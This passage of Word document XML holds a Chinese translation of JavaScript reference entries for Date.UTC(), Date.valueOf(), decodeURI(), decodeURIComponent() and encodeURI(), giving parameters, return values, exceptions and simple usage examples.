      </w:pPr>
      <w:r>
        <w:t>毫秒值，指定为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>999</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个整数。这个参数是可选的，在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前，这个参数会被忽略。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定的全球时间的毫秒表示形式。也就是说，这个方法返回</w:t>
      </w:r>
      <w:r>
        <w:t>1970-01-01</w:t>
      </w:r>
      <w:r>
        <w:t>午夜（</w:t>
      </w:r>
      <w:r>
        <w:t>GMT</w:t>
      </w:r>
      <w:r>
        <w:t>）与指定时间的毫秒数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.UTC()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个静态方法；须通过</w:t>
      </w:r>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数调用它，而不是通过具体的</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.UTC()</w:t>
      </w:r>
      <w:r>
        <w:t>的参数指定一个日期及时间，将当做</w:t>
      </w:r>
      <w:r>
        <w:t>UTC</w:t>
      </w:r>
      <w:r>
        <w:t>解析；使用</w:t>
      </w:r>
      <w:r>
        <w:t>GMT</w:t>
      </w:r>
      <w:r>
        <w:t>时区。指定的</w:t>
      </w:r>
      <w:r>
        <w:t>UTC</w:t>
      </w:r>
      <w:r>
        <w:t>时间将转换为毫秒格式，可用于</w:t>
      </w:r>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数方法和</w:t>
      </w:r>
      <w:r>
        <w:t>Date.setTime()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数方法和</w:t>
      </w:r>
      <w:r>
        <w:t>Date.UTC()</w:t>
      </w:r>
      <w:r>
        <w:t>所能接受的日期及时间参数完全相同。不同之处在于，</w:t>
      </w:r>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数使用本地时间，而</w:t>
      </w:r>
      <w:r>
        <w:t>Date.</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>UTC()</w:t>
      </w:r>
      <w:r>
        <w:t>使用全球时间（</w:t>
      </w:r>
      <w:r>
        <w:t>GMT</w:t>
      </w:r>
      <w:r>
        <w:t>）。可以使用类似下面的代码使用</w:t>
      </w:r>
      <w:r>
        <w:t>UTC</w:t>
      </w:r>
      <w:r>
        <w:t>定义来创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>d=new Date(Date.UTC(1996,4,8,16,30));</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Date</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.setTime()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="652" w:name="Date_valueOf__"/>
      <w:r>
        <w:t>Date.valueOf()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="652"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>转为毫秒表示形式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>重写</w:t>
      </w:r>
      <w:r>
        <w:t>Object.valueOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date.valueOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的毫秒表示形式。返回值与</w:t>
      </w:r>
      <w:r>
        <w:t>Date.getTime()</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="653" w:name="decodeURI__"/>
      <w:r>
        <w:t>decodeURI()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="653"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>解码一个</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>中的字符</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decodeURI(uri)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>uri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个包含已编码的</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>或其他待解码的文本的字符串。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uri</w:t>
      </w:r>
      <w:r>
        <w:t>的一个副本，其中所有十六进制转义序列都已替换为它们代表的字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>UR</w:t>
      </w:r>
      <w:r>
        <w:t>IError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:t>uri</w:t>
      </w:r>
      <w:r>
        <w:t>中的一个或多个转义序列格式有误，不能正确解码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>decodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个全局函数，返回它的</w:t>
      </w:r>
      <w:r>
        <w:t>uri</w:t>
      </w:r>
      <w:r>
        <w:t>参数的一份解码后的副本。它是</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>的逆操作，更多细节可参阅该函数的参考页面。</w:t>
      </w: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decodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>escape()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>unescape()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="654" w:name="decodeURIComponent__"/>
      <w:r>
        <w:t>decodeURIComponent()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="654"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>解码一个</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>组件中的字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>decodeURI(s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个包含已编码的</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>组件或其他待解码的文本的字符串。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s</w:t>
      </w:r>
      <w:r>
        <w:t>的一个副本，其中所有的十六进制转义序列都已替换为它们所代表的字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>URIError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>中的一个或多个转义序列格式有误，不能正确地解码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>decodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个全局函数，返回它的参数的一个已解码的副本。它是</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>的逆操作，更多细节可参阅该函数的参考页面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>decodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>escape()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>unescape()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="655" w:name="encodeURI__"/>
      <w:r>
        <w:t>encodeURI()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="655"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>转义一个</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>中的字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>encodeURI(uri)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>uri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个包含</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>或其他待编码的文本的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>uri</w:t>
      </w:r>
      <w:r>
        <w:t>的一个副本，其中某些字符已被替换为十六进制转义序列。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>URIError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:t>uri</w:t>
      </w:r>
      <w:r>
        <w:t>包含非法的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>代理项对，不能编码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>encodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个全局函数，返回它的</w:t>
      </w:r>
      <w:r>
        <w:t>uri</w:t>
      </w:r>
      <w:r>
        <w:t>参数的一个编码后的副本。</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>字母和数字以及下面的</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>标点字符将不会编码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>-_.!</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>*'()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>的意图是编码完整的</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>，因此下面这些在</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>中有特殊含义的</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>标点字符也不会被转义：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>;/?:@</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>=+$,#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>uri</w:t>
      </w:r>
      <w:r>
        <w:t>中的其他字符将被转换为对应的</w:t>
      </w:r>
      <w:r>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:t>编码，并将结果的一、二或三个字节编码为一个</w:t>
      </w:r>
      <w:r>
        <w:t>%xx</w:t>
      </w:r>
      <w:r>
        <w:t>格式的十六进制转义序列。在这种编</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>码机制中，</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>字符将被替换为一个单独的</w:t>
      </w:r>
      <w:r>
        <w:t>%xx</w:t>
      </w:r>
      <w:r>
        <w:t>转义序列，编码在</w:t>
      </w:r>
      <w:r>
        <w:t>\u0080</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>\u07ff</w:t>
      </w:r>
      <w:r>
        <w:t>之间的字符将被替换为两个转义序列，其他所有的十六位的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符则将被替换为三个转义序列。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用这个方法来编码</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>时，必须确保该</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>的组件（如查询字符串）都不包含如</w:t>
      </w:r>
      <w:r>
        <w:t>“?”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“#”</w:t>
      </w:r>
      <w:r>
        <w:t>等的</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>分隔字符。如果这些组件必须包含这类字符，则应该使用</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>来对每个组件进行单独编码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>decodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>是这个方法的逆方法。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>版之前，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>escape()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>unescape()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（现在这两个方法已弃用）来执行类似的编码和解码。</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返回</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.isp.com/app.cgi?arg1=1</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>arg2=hello%20world</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>encodeURI("http://www.isp.com/app.cgi?arg1=1</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>arg2=hello world");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>encodeURI("\u00a9");//</w:t>
      </w:r>
      <w:r>
        <w:t>版权字符将编码为</w:t>
      </w:r>
      <w:r>
        <w:t>%C2%A9</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decodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>decodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>escape()</w:t>
      </w:r>
      <w:r>
